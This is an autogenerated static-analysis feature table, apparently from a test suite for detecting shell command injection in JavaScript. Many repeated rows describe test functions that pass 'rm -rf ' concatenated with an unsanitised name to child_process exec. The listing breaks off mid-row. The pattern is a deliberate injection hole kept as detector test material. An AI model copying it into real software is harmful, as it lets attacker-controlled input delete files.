autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:3 | cp | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:8 | cp.exec | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:5:117:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:5:117:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:5:117:8 | exec | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:5:117:8 | exec | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:5:117:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:10:117:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:22:117:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:19 | module.exports.safe | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:19 | module.exports.safe | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:120:19 | module.exports.safe | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:127:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:127:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:1:127:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:8:120:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:8:120:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:8:120:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:16:120:19 | safe | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:16:120:19 | safe | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:16:120:19 | safe | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | cp | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | cp | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | this | enclosingFunctionBody | name cp exec rm -rf name isSafeName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | this | enclosingFunctionName | safe | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:120:22 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:120:23:127:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 